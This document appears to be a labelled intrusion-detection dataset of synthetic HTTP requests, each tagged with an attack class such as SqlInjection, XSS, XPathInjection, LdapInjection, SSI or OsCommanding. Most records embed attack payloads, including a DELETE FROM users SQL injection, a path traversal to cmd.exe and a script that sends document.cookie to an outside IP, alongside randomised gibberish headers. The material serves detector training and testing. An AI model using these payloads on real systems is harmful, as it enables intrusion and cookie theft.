UA-CPU: Sparc
UA-Disp: 080,7533,8
Via: dap0m/8.9 www.Aiarrhda.shtml:26
Transfer-Encoding: deflate
Upgrade: is65/4.0, tshy/4.7
Warning: 198 130.0.9.220:076 "si9M9yfcee" 
X-Forwarded-For: 169.105.19.193
X-Serial-Number: 067866355817969470
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41134
Start - Id: 40687
class: SSI
GET /nioinuseircnlNhdnp/9G@rph-9RLgstdinI/jUt.bin?routrTaa2rtsNnc=ft&gBw=%3C%21--++++%23include+++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++--%3E&A2ceamoohotonaE=23&tvP=rl-&kebBM_U=o38x&tiCendekbhrsaol=s4xt&oS7f=obl%7Er+4&ecn7reur7tlujet=nmah&httpsupdate-7objectF=nnztVAId&r8klfag=v3C&tQYhwhereifconnectlink=08397&oiDl0aTEvc8tt52=tLtaejnrehFistNmid&.UvconnecthavingJ=5347&hnEotnDut=ns&zTSgeDtexecO1=0295113128 HTTP/1.1
Host: 190.216.4.15:2
Connection: close
Accept: video/*;q=0.4, video/quicktime;q=0.1
Accept-Charset: *;q=0.5
Accept-Encoding: gzip, deflate;q=0.1, identity, identity;q=0.3
Accept-Language: egsfoedi-teo;q=0.1, vadeewTz-fnIf;q=0.0, t3-Oer;q=0.9, iyi-iONiqo, fynmtn-8eh;q=0.6
Cache-Control: max-stale=4509
Cookie: ciaamiwdoq=E%eespeMhse;iH=82839;qs4tEyewna=eHsz@uPC;oSAC8sEBrFprocessing-instruction9=ao2 anrs1eWbnrma;do=61057
Cookie2: $Version="70"
Date: Sat, 01 Jul 06 09:17:45 GMT
ETag: "GptlDo7NDuQtbKkqIsI"
Expect: 100-continue
If-Modified-Since: Thu, 17 Jun 04 19:34:27 GMT
If-Unmodified-Since: Wed, 09 Feb 05 13:42:50 GMT
If-Match: *
If-None-Match: "HY4LNrto3Ph5t0PV57o0"
If-Range: Wed, 31 May 06 09:30:07 UTC
Max-Forwards: 948
MIME-Version: 0.6
Pragma: no-cache
Referer: http://www.gennds.be/Psor4c/ohTmaa/Teubdtii.jpeg
TE: gzip
Trailer: Date
User-Agent: Mozilla/8.9 (Windows; U; Win 9x 2.3; vg-3i; rv:1.2.4) Gecko/17932421
UA-CPU: x86
UA-Disp: 662,039,16
Via: FTP/9.0 164.4.105.68:320, FTP/5.5 127.13.253.132:53
Transfer-Encoding: 6Neyv
Upgrade: jre/3.8, na6R91/0.3
X-Forwarded-For: 31.11.7.35
X-Serial-Number: 322812284
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 40687
Start - Id: 41609
class: SqlInjection
GET /hkEiat2imnehs/eOBzOwynl1mlPnkq9SR/r06U_w@JogCS_HhJ/-htpasslhIdivJyi/eratotedOkz.mdb?eh=rf6&EiFLzzGhYK__=select+++lnud+from++++ALL_USERS HTTP/1.0
Host: 99.121.244.63:8182
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: x-mac-turkish, windows-1255, us-ascii;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 104.108.5.26
Cookie: uqeo=0dosm;hao8sz1=514828300;8f=sFM23Q
Cookie2: $Version="7"
Date: Thu, 10 Aug 06 20:56:45 UTC
ETag: "EJur0tLyBzqkc1WWl1r"
Expect: 21isusex=tfanht;a6dua
From: tcssd@oays6you.com
If-Modified-Since: Mon, 29 Mar 04 08:07:33 CET
If-Unmodified-Since: Fri, 06 Feb 04 08:51:24 UTC
If-Match: *
If-None-Match: *
If-Range: "U_yPt@IBIvFgpvR"
Max-Forwards: 23
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: mntre es5jmh0t=sta8dmeb
Authorization: Isneg eagg4=a8zhaegl
Range: -827608,0-149272
Referer: http://www.aMzAp.net/nmhzotn/T6wg3sa/qe4aoe/0t4t/6sln.exe
TE: trailers,trailers
Trailer: Referer
User-Agent: Mozilla/3.8 (compatible; Konqueror/0.4; Unix; moew0)
UA-CPU: MIPS
UA-Disp: 5571,966,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 0620x1367
Via: 1.5 www.ilmoha.js, HTTP/6.9 120.77.115.214, ocrh1i/5.1 www.ymunfy.gif
Transfer-Encoding: eirRsr; Aetn=dlapJ63e
Upgrade: bxnsG/8.0, e7cm/6.6
Warning: 846 125.8.137.130 "rhch5ohdnsoyi" "Mon, 08 Dec 08 08:13:31 GMT"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41609
Start - Id: 48595
class: XPathInjection
PUT /rlP/lssWe/nN5/owB6YZOn_2ULI42/kEN05VcVkZJ/rMqWSfHk4ZJ9SXiidHM3.tiff? HTTP/1.0
Content-Length: 398
Content-Language: ssbAnha
Content-Encoding: gzip
Content-Location: /dnFirDnt/teempua/teuorvst/Aa7dlk9e/e6n2.zip
Content-MD5: bWttU2Vyb2d1bmllZzhlYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 27 Jun 07 16:01:46 GMT
Last-Modified: Sat, 31 Jan 04 03:49:45 GMT
Host: 13.87.132.89:80
Connection: close
Accept: */*
Accept-Charset: iso-8859-6;q=0.2, x-mac-japanese, x-mac-korean;q=0.5, x-mac-hebrew;q=0.6
Accept-Encoding: deflate;q=0.1
Accept-Language: *
Cache-Control: no-store
Client-ip: 58.151.109.14
Cookie: noixRe4yyrs=00266712;tha9Utfed2m=3867;P0nwinntgQHUtDAv=atcyTioeahn 3d;ieo;Bnf9ehw=150;orav=samwb:mouus;acona=w
Cookie2: $Version="357"
Date: Sat, 10 Jun 06 23:54:46 UTC
ETag: "24798vzil9D39PB9"
Expect: 100-continue
From: LhY2ychA@lseaat.st
If-Modified-Since: Thu, 19 Oct 06 21:37:03 CET
If-Unmodified-Since: Fri, 19 Oct 07 09:57:59 GMT
If-Match: *
If-None-Match: "r-cV4nOGbLmGn0hdDQ"
If-Range: Wed, 10 Dec 08 08:26:17 UTC
Max-Forwards: 41
MIME-Version: 0.0
Pragma: mrq='o'
Proxy-Authorization: Basic eG9IaTZ0ZGc6ZWZOcmg=
Authorization: Basic bGUxdDpudXpTZnE=
Range: 39-76,5-4266
Referer: /3slhss.dll
TE: deflate;q=0.7,gzip
Trailer: Authorization
User-Agent: Mozilla/2.8 (Machintosh; U; PPC Mac OS X 3.7; on-if; rv:4.6.4) Gecko/54908822
UA-CPU: PowerPC
UA-Disp: 5404,3137,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 853x5228
Via: 7.5 www.rQnn.tiff, artjhe/1.2 www.hbAwet.gif, FTP/0.8 220.203.239.194
Transfer-Encoding: deflate
Upgrade: iroi/0.7, Osior/8.4, 9Ceim/4.8
Warning: 711 www.2azi1lut.css "nhuTpph3osOgtutn" "Sun, 02 Nov 08 07:06:07 CET"
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 41138293275827237103
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

3mryxassebh=tf&eTsieYaoa=782620&JNSE5qG1X=a3LRWnd&lrpe4Ltrm6m=98&tu7aY=i3:nma?eicaselectptwindow.open&s2tesehj=teeaeds'    or  1<     fhsa9/eaR3/oti/child::text()[position()=61] or   's8tTcRnS'=  '&eBsti= tnr&gaPOl4samdr=ipeAedetm&adnlnhh5=evalgp&fU=lo1dwesc6ehAo&tLdCmskt=5950586486&tlfaeuwdFnehL=&matl&oI4=&i h p&ten=aiuEcwiesnrrnC4t&mcoei0=roroNwpsurd

End - Id: 48595
Start - Id: 42488
class: SqlInjection
GET /yawn4ixtm/dVx9IfM5J2g-@U/dcrN/wkGumyUnyArrA0vaj.tx.msf?90winntGYT=ahh+onbody%29eetmpwl&igoahFTo=%27+++++OR+++++%27tnrtoafEah%27%3D++++%27++++&fhispu=2251504&at=43253&eeAc=s&rncniiNtprr8nme=iAVKcbPk&iiltcirei=58&ohenaaNTEru=9881778 HTTP/1.0
Host: 207.174.126.82:2038
Connection: close
Accept: text/xml;q=0.6, application/rtf;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: omnc-aRqv2;q=0.3, aghtoO-Txohtae, t5ltshu-dra, t9n-g;q=0.8, atos-ecfgyrew
Cache-Control: x1eee=lehelvrp
Client-ip: 215.176.56.170
Cookie: mtermtcairtfyHp=egKoae]y;tenEtapu=ah;nf5lhy=6015892;ygaYedafrnoetc=r8MuKzqIe9;RcY3KO=h
Cookie2: $Version="2"
Date: Sat, 23 Jan 10 18:17:17 CET
ETag: W/"5YJ9gTlr.4GpRna"
Expect: 100-continue
From: sheo@RafNi.uk
If-Modified-Since: Thu, 29 Jan 04 12:20:29 CET
If-Unmodified-Since: Tue, 06 Sep 05 14:11:54 CET
If-Match: *
If-None-Match: "iwq@3s2mgcWRUKiF0P0R"
If-Range: Sun, 28 Dec 08 11:25:45 UTC
Max-Forwards: 2827
MIME-Version: 8.5
Pragma: em=eqCs
Proxy-Authorization: tnrr qtclsQSi=e3eg
Authorization: NTLM a2U3Zmk2dGVrT1RybURzMGVuTXN6Z2RuT2loc2Vuc2V1bWVzY3BpYmtycw==
Range: 7-59040
Referer: /boahnp/Seiude.cgi
TE: trailers,chunked;q=0.2
Trailer: Transfer-Encoding
User-Agent: ulhUTBMEE http://www.hirnRUw.it
UA-CPU: x86
UA-Disp: 6364,160,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 733x829
Via: 3.9 140.81.172.120, 9.7 225.193.128.98
Transfer-Encoding: bnknM1; 9Rwn=qdoe
Upgrade: ihs/6.9, sw1v/7.0, tkg/8.2, rtlu/7.8, heTt/3.6
Warning: 682 9.47.244.88 "t7gglstsHoti" "Mon, 21 Jan 08 24:54:57 UTC"
X-Forwarded-For: 25.37.30.27
X-Serial-Number: 029543372781579317
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42488
Start - Id: 41941
class: SqlInjection
GET /UeQkska71JqXB/sCh5vv/t2Ff6odQGNUE/DnSZdkgpwinnt0Er9/nkbKfOXck1Xc48OX/QdSHe/ilu3entbdn/sdsPrreots/a4a/gAVhIMTt0tWmK7sH8AP/eeTrlolouisesdlo/EaAfhtr.jpeg?OgAKlinkKYu=%27+union++++select+++++%40%40version%2C1%2C1%2C1--&rasrajCg8ap=93&iHnue=22666 HTTP/1.1
Host: 41.68.124.20
Connection: thnhx1oV
Accept: text/*;q=0.1
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 148.203.206.38
Cookie: a.iIVI=dprm]einsert;ha=snjr - hossauIkuvbscript a;emo2hmov0sl1sr=43929893;U8kd=sehaoal3Ord0hha;irIh7=997;nr9tf=1184048
Cookie2: $Version="8"
Date: Fri, 11 May 07 14:54:19 CET
ETag: "STLwztEysXjjA5_mC8"
Expect: anwaeesd
From: erpnsemv@5tAwdogn.st
If-Modified-Since: Tue, 13 Mar 07 17:49:21 GMT
If-Unmodified-Since: Thu, 29 Apr 10 13:26:41 UTC
If-Match: *
If-None-Match: "mt-udyq80kMC2wpVQ"
If-Range: Wed, 13 May 09 24:35:46 CET
Max-Forwards: 1167
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: aies sesl=fkaciu
Authorization: Basic dG1zRWhzOndCQWxsN3Q=
Range: 55660-
Referer: http://ssast.cz/thr3sett/eRcd.css
TE: trailers,trailers,chunked;q=0.0
Trailer: If-Unmodified-Since
User-Agent: smdewewuadidsiwirseh
UA-CPU: x86
UA-Disp: 4298,556,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 724x022
Via: 3.6 www.tgEj.jpg, FTP/5.6 www.obacro2e.tiff
Transfer-Encoding: identity
Upgrade: imn/2.9
Warning: 985 75.9.47.68 "9pnu" "Mon, 31 May 04 18:02:50 CET"
X-Forwarded-For: 79.193.225.128
X-Serial-Number: 79709150
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41941
Start - Id: 46718
class: XSS
GET /sh6IZ6S6/m3p8AScUxyEDgqTpP.css?thao=giehrTordlget&sfeneened=crtIedfl&aAnhgsiktu=7&ninvkd=+acqtn4%3Ei&Dbbha=niuu&ictistbci=otfhe-&ksiitv9=Nhnys&tR9iaihauatc=nFxTgaRV&rtoeme=cRPADKe&eelo=tscnbtore&d2rftsentjrnf=bRZ&wsury=asyn-v&xffwEcareanLouh=aoI&eg1uxo=acA HTTP/1.1
Host: www.ieut0ofiw.org
Connection: close
Accept: text/plain;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ewwn-s, lneNty-t, trq8ba-tis
Cache-Control: min-fresh=77
Client-ip: 246.179.214.235
Cookie: jnrn5OAte=b3I4f;oflnncIpe0smwc=oyogroup byt:rlt7:)noOzDh;ahsanh=o8oooT  onload=javascript:  alert   (xmoge.eywlndo);opmzsA=?logeovp )dushesrcpmnullhRreplace
Cookie2: $Version="3"
Date: Fri, 29 Dec 06 16:46:32 GMT
ETag: W/"dMTPDt6OJr4ueBd6sL"
Expect: nu72idah
From: anere9f@oidevoD.uk
If-Modified-Since: Sat, 29 Jul 06 20:07:50 CET
If-Unmodified-Since: Wed, 26 Mar 08 21:09:46 CET
If-Match: *
If-None-Match: *
If-Range: "5_LgKLK7@NqqlWO4"
Max-Forwards: 332
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Basic TmU4YTp2a0FvNm0=
Authorization: Digest uri=http://www.ecsyA.st/c0b1/ohorOec/fonanie/hrke.pdf
Range: -3,-90081,-299741
Referer: /teszg/ntrrk/tt0a8/Nehv5n7g/siSL.mdb
TE: trailers,gzip;q=0.5,trailers
Trailer: If-Range
User-Agent: Mozilla/4.4 (Machintosh; U; PPC Mac OS X 7.5; ed-et; rv:2.7.8) Gecko/11482510
UA-Disp: 365,342,16
UA-OS: Windows 95
UA-Pixels: 040x726
Via: 1.3 185.133.49.136, 4.1 11.155.133.110
Transfer-Encoding: niory
Upgrade: 8oi/9.6, sz3/0.0, Eett/5.7, bnn6/7.9
X-Forwarded-For: 166.176.57.0
X-Serial-Number: 15071765483594202
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46718
Start - Id: 42244
class: SqlInjection
GET /zV0U.CGizRd.82g/h2NJhQV0qeCetcdp.gif?8Zp=diaqfe%29cheusryd99&ntol9ciw=bm%3C+stn6&tdvctrfdoyav=leso9hSsea&bi1frxQ=d&uyeClu=onr&hzqzVnetcatH=fRKjv&ixbeow200=841&t7ea=ylnNWd6uoySstYL&0tn=t4r&mas=pasnservicesntnIse%3Blh%3Bhaving&wgetVnsA=uek%3Ctie&tbnatci0a=%27+++%2F**%2F+++++OR+++++%2F**%2F%27%27++++%3D++++%27 HTTP/1.0
Host: www.ienjo.ch
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: re6vR-trehzOle;q=0.2, 9el3Px-sfp4r48h
Cache-Control: max-stale=493
Client-ip: 83.53.205.169
Cookie: t7s642e=c;kjQKcbpVQLea=7;reyteshsE=iaa;wchpergatheWk=85
Cookie2: $Version="26"
Date: Tue, 14 Mar 06 17:52:14 CET
ETag: "AwZJ1R96_ZwyUkum"
Expect: 100-continue
From: AhkTtd8@hidg5ir.de
If-Modified-Since: Sat, 31 Jan 09 09:28:58 UTC
If-Unmodified-Since: Tue, 19 Dec 06 07:38:26 GMT
If-Match: *
If-None-Match: "DueicDOUj6znCfR"
If-Range: *
Max-Forwards: 2022
MIME-Version: 7.5
Pragma: eRot='7e9rdKid'
Proxy-Authorization: NTLM M2FlbzFvd2R2amFoamFybnhjcWx1dXRkMXZhOXhMaXRtbmtzc2RPYXBl
Authorization: Digest response="fdABD60040aBd3c0B3B33eC26Bca4A8f"
Range: 4539-14148,-19,934-
Referer: http://www.nSui.cz/debyo/slaw/mel6me/ntmdie4.msf
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: ele4eo (q3th5yWkm; eo.pGGAzE; yogrtM; eulVfKDE9; 6wmwqG)
UA-CPU: StrongARM
UA-Disp: 8058,0040,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 108x2342
Via: HTTP/1.9 25.245.83.106
Transfer-Encoding: gzip
Upgrade: rRra/8.9, int0ly/0.7
Warning: 394 53.12.160.154:24328 "tjynhe869r" 
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 29366252
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42244
Start - Id: 47689
class: XSS
GET /sLyvgYhdUnv6zxCgzj.cgi?aa5teprti=ss&w_bw=9236&kfGxhijb=47128992&TrhlhuseaShqem=alet&sb4anX6s=iTB&5z2W._rG-H=WwoptAmttp&oriao1=13461705&pOO62dooe=Ncdehlau&dl=%3C%21%5BCDATA%5B%3C%21--%5D%5D++++%3E%3Cscript++%3E%5Bwindow.open%28%27http%3A%2F%2F243.82.162.204%2Ftoasta.exe%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript%3E&ienmshoo4tSM=6265587550&sdasdmoeuttto8l=11&aesahoqc=9&oitda=7l+m HTTP/1.0
Host: 53.236.159.103
Connection: ioneeDre
Accept: */*
Accept-Charset: cp-950
Accept-Encoding: gzip;q=0.3
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 45.106.75.118
Cookie: Eomdthteiacdi=oE3tr5bin;1ok=e/uevusr etg
Cookie2: $Version="3"
Date: Sat, 17 Jun 06 12:54:04 CET
ETag: "6U3@g.r9YVe.JQCtdKWO"
Expect: wmt6or
From: maxEoc8e@ae6eyisrl4.biz
If-Modified-Since: Thu, 15 Jan 04 04:11:42 UTC
If-Unmodified-Since: Sat, 18 Oct 08 20:30:31 CET
If-Match: "cceikmvcl2_dRmdRVL-"
If-None-Match: *
If-Range: *
Max-Forwards: 648
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: sxorov avcea=rose
Authorization: Basic dDlyeWxyYUg6ZXdvTHQzZQ==
Range: 57-,235-9884,973-85
Referer: /9ekHa/ynst.mpg
TE: trailers,deflate;q=0.8,gzip;q=0.5
Trailer: From
User-Agent: Mozilla/9.4 (Windows; U; Win 9x 9.4; lu-ry; rv:7.4.3) Gecko/89723291
UA-CPU: 68000
UA-Disp: 0445,5858,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 934x7117
Via: FTP/1.1 www.e2ioE.shtml, HTTP/4.5 www.byateS.css, HTTP/9.4 213.68.31.224
Transfer-Encoding: compress
Upgrade: e33s9E/0.6
Warning: 797 10.182.112.205:62 "mparhiqesWqMnqIet2" 
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 6943669939
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47689
Start - Id: 48459
class: XPathInjection
GET /1PQujIg8pIwbGC-l/tiVt2pPa3a8b/yoqfMaooreVaSo7setrm/zzcEa/oetuasoppeosue/fUikfO5n42nt/Cupwe.js?topX=eo&yr9o=u%3C&sestkesFIhnnni=402&yoejjeetenteoe=oi9&E7Giwsai=0&ZdI3uYuYA=vfM&exhodL1tgA=-ylh HTTP/1.0
Host: 67.199.19.3:80
Connection: s0h8
Accept: */*;q=0.5
Accept-Charset: *;q=0.4
Accept-Encoding: identity;q=0.5, identity, deflate;q=0.9, compress;q=0.5
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 62.130.69.26
Cookie: 7JFS7location=47;t9hItiS=ThIr'  or    6   <   count(path/child::*)    or    'ARykh8'    =    ';bjbbBFsG=l;SmqesIaipllTu=crhttpshoac ot;ijas2e=AR\@a(g
Cookie2: $Version="2"
Date: Fri, 20 Aug 04 16:24:21 GMT
ETag: "RRUse9HbmgynUgn"
Expect: 100-continue
From: nuehal@ifkmfi.it
If-Modified-Since: Tue, 09 Dec 08 13:04:42 UTC
If-Unmodified-Since: Mon, 13 Feb 06 24:17:03 GMT
If-Match: "_UlfNBSgaV29uz_djm_H"
If-None-Match: "6R11zJZQGNnqXx72f"
If-Range: Sun, 13 Feb 05 17:08:23 CET
Max-Forwards: 144
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: NTLM ZUFsc2FiY2FtRWVyZTF0VXZ0aG9obm80b3BsYjYxbGh0cmVsMzdhelR3b250ZWxo
Authorization: Oz8hc ceda2o5=icNt
Range: -381,-88229,590-
Referer: http://www.fuoeoxe.uk/urdYl/Aiosdw/rx8devsl/brljeee/Yiatmx7.cgi
TE: trailers,chunked;q=0.3,gzip
User-Agent: Mozilla/2.2 (Windows; U; WinNT 5.1; re-og; rv:8.3.1) Gecko/83970280
UA-CPU: Sparc
UA-Disp: 746,1547,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2402x7254
Via: giy5lo/1.1 www.Kuekrurn.htm
Transfer-Encoding: compress
Upgrade: daft/8.1, resali/5.5, hne1/8.0
Warning: 776 232.210.70.64:9838 "sOs0susNndlssbkeaeh" "Mon, 26 Mar 07 07:02:44 GMT"
X-Forwarded-For: 3.118.59.198
X-Serial-Number: 881741666326313
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 48459
Start - Id: 44149
class: OsCommanding
GET /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 183.58.115.96
Connection: diei
Accept: video/quicktime, image/*, application/*;q=0.3
Accept-Charset: windows-1253, windows-1254, x-mac-arabic;q=0.9, x-mac-japanese;q=0.0, windows-1252
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 39.47.60.88
Cookie: yaJouAiyuekie=addaa;lIOnsr=11155185;iolplrbsyfnnhe=29785256
Cookie2: $Version="16"
Date: Thu, 19 Nov 09 01:01:44 GMT
ETag: "6XvZ@tbYKP1gwcT"
Expect: 100-continue
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Sat, 11 Aug 07 08:00:30 UTC
If-Unmodified-Since: Fri, 30 Apr 04 18:50:21 GMT
If-Match: "D.@porpLCF@3E-TB4"
If-None-Match: "I1IP.dXWP20@9hwCk6.6"
If-Range: Sun, 28 Nov 04 07:58:01 GMT
Max-Forwards: 55
MIME-Version: 4.2
Pragma: l2='nndRc'
Proxy-Authorization: Digest realm
Authorization: Digest algorithm=MD5
Range: 815-,644-20793
Referer: /iddn.gif
TE: trailers,trailers,gzip
Trailer: Date
User-Agent: Mozilla/1.9 (Windows; U; Win 9x 2.7; yx-du; rv:0.6.8) Gecko/31402541
UA-CPU: Sparc
UA-Disp: 616,3302,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 5788x525
Via: 3.3 74.6.233.37, FTP/4.3 205.130.142.7, tn3/0.6 www.re0pe.jpeg
Transfer-Encoding: ha1tyt
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 461 www.cMmiov.shtml "nih5iohnfhs8ylysduaa" "Thu, 12 Feb 09 12:33:00 CET"
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44149
Start - Id: 37515
class: LdapInjection
POST /eroea8mSjGhe8u/eietrudoETErimpl/2eewhpzeninzo.aspx? HTTP/1.1
Content-Length: 224
Content-Language: 5eu
Content-Encoding: identity
Content-Location: http://www.nyeke.org/r4eieI/rfuninDh/6npynat/weslol0/siSuSte.jsp
Content-MD5: YXRsZGE0dG9nbG5ycm9lZA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 21 Jul 04 08:47:31 CET
Last-Modified: Fri, 20 Apr 07 20:09:18 CET
Host: 241.120.35.128:96446
Connection: close
Accept: */*;q=0.6
Accept-Charset: x-mac-greek, cp-936;q=0.6, euc-tw
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 216.146.227.172
Cookie: raDitltr=3455;2lr=muald;AelEta=661;geoosiysel=532372;admin.uTT2=Le e7i >eT7<mew
Cookie2: $Version="571"
Date: Fri, 08 Sep 06 19:16:06 UTC
ETag: "u34qWBiJNpxKq9A"
From: t7in1r0e@I35dntt6be.fr
If-Modified-Since: Wed, 27 Apr 05 12:30:48 CET
If-Unmodified-Since: Tue, 12 May 09 02:54:26 CET
If-Match: "OSkvfGtAenBHvp1LP"
If-None-Match: *
If-Range: *
Max-Forwards: 587
MIME-Version: 0.6
Pragma: rU='6tge'
Proxy-Authorization: Digest username="htyrO"
Authorization: NTLM dGFzbHRyb3l3Vm92dGNtcnBhYXRpamhyV0tyYW94c3lvOGFzVWxyYW9l
Range: 0516-7855,069180-,334-
Referer: http://2lsruleo.be/eRmwaa/4oop/9h0e9.avi
TE: deflate;q=0.5
Trailer: Connection
User-Agent: Mozilla/7.3 (compatible; es3hmoocpe; SunOS sun4u; yl2htwrh)
UA-CPU: 68000
UA-Pixels: 2665x9772
Via: HTTP/9.6 221.168.145.233
Transfer-Encoding: gzip
Upgrade: c0e/0.5, ndgd/9.1
Warning: 123 www.sswne9.png "xiaoxtnnd9tipju" 
X-Serial-Number: 4606842395290054569

5eierv=18&beedoiPcii=978&uatooeNeTin5= y[like&5mdnlhaoshDft=mien&awtr=iltm)(&(objectClass  =   xa*)&JBLzvhavingstdin7=of8PuBlY1XX&dirglecpa2Qweti=83490&mteitshgkhW0i=Ehrowa&1aondi=ux9mGwvjZnbK&bai5hii=r2Zx2c_ez

End - Id: 37515
Start - Id: 37866
class: LdapInjection
GET /gRWNEJmail/ii4r9idbenoe7nutts0/e.dyOZE3/NzshutdownMB4uygMyG/5jIdQphp/Ck/rDmizZQi6.pl?ajp0=%29+++%28++++%7C++++%28displayName%3Dhad*%29+%28name%3D++++had*++%29%28+++mail%3Dhad*+++%29&85yaaiidFni=is HTTP/1.1
Host: 243.87.51.241
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: deflate, deflate;q=0.7, compress;q=0.0, deflate, identity;q=0.3
Accept-Language: fEae-l;q=0.8, seqfN-o9oeu;q=0.4, srres3-3wh
Cache-Control: only-if-cached
Client-ip: 22.110.9.101
Cookie: bCleurnw4=9533;hedqiv7f1tjn=871210;pn=jheaf;enuhtvp8Eyaba=8820451786;nses=odftjn;iqtrn2t=7
Cookie2: $Version="63"
Date: Thu, 11 Mar 04 08:38:33 CET
ETag: W/"WzL44rPnMuACbA9"
Expect: 100-continue
From: dxmog@eeOtwtfr.com
If-Modified-Since: Tue, 10 Mar 09 19:19:26 GMT
If-Unmodified-Since: Sat, 17 Oct 09 05:57:23 UTC
If-Match: "c6FC5Mm@FvNAWs."
If-None-Match: "ZJJu0eD6TeejPDPKKp7e"
If-Range: *
Max-Forwards: 3
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Atfeo UKet=rucegw
Authorization: Basic b25Mc3M3aTpxaWVh
Range: 1-,245-14,-1105
Referer: http://www.terilatf.ch/synnlEf/8erdP/itaun/pdlbhshr/wdtu.cfm
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/8.3 (compatible; pey9elad; WinNT; 0sEnt8; 4Praed; enyumR)
UA-CPU: Sparc
UA-Disp: 8628,0806,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: iNhtts/2.7 www.Trst.css:6819, 6.8 9.233.253.163
Transfer-Encoding: gzip
Upgrade: obeThi/2.4, ems/4.7
Warning: 785 154.219.196.57 "riredam4aosbhnieNsek" "Wed, 10 Jun 09 10:24:56 CET"
X-Forwarded-For: 223.104.48.29
X-Serial-Number: 300384
----: --------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 37866
Start - Id: 41999
class: SqlInjection
GET /nnndeoNeiunLEf3/e.R/swt2rDrqr/zcw6oheedstbnyeeT.php?5zNWNc8X=4615479&IX0yeH=tdin+dblefeno&testn=ww%25m&npf5u5aiicdQ=e&snsisst1=oj3t%27++++%29%3BDELETEFROMusersWHEREupper%28username%29+%3Dupper%28+++%27admin&tttowfce=%2Fd&dnIl0iR=slopt&STtformyeval=47533&ospt=680627782&lMteu=8tcnetcatoo%3Ah&dxoerwasthtihoo=eenhso7&peeut=369 HTTP/1.0
Host: 23.71.191.123:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-stale=31
Client-ip: 134.245.214.117
Cookie: ginputwherelN=d;crien5o=9728037;n3irqswo1tcwei=tbmuy5
Cookie2: $Version="419"
Date: Sat, 23 Feb 08 23:17:29 CET
ETag: "VjP__Uh7jvJaJAs2qgs"
Expect: qdhiW=zajnoi;dhetiyu
From: wXro@erouh.com
If-Modified-Since: Sun, 02 Nov 08 14:19:39 CET
If-Unmodified-Since: Mon, 07 Jan 08 01:48:18 CET
If-Match: "G3eT-28kLXbhnSCAHZeN"
If-None-Match: *
If-Range: *
Max-Forwards: 105
MIME-Version: 0.8
Pragma: usUbw=enbrvd
Proxy-Authorization: onwe taah2z=emIar
Authorization: Digest qop=auth
Range: -728027,84041-8,736156-
Referer: /szafp/h45wy/rtjnnm.doc
TE: deflate,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.7 (Machintosh; U; Mac OS X 7.9; jh-Wt; rv:7.5.7) Gecko/19453169
UA-CPU: StrongARM
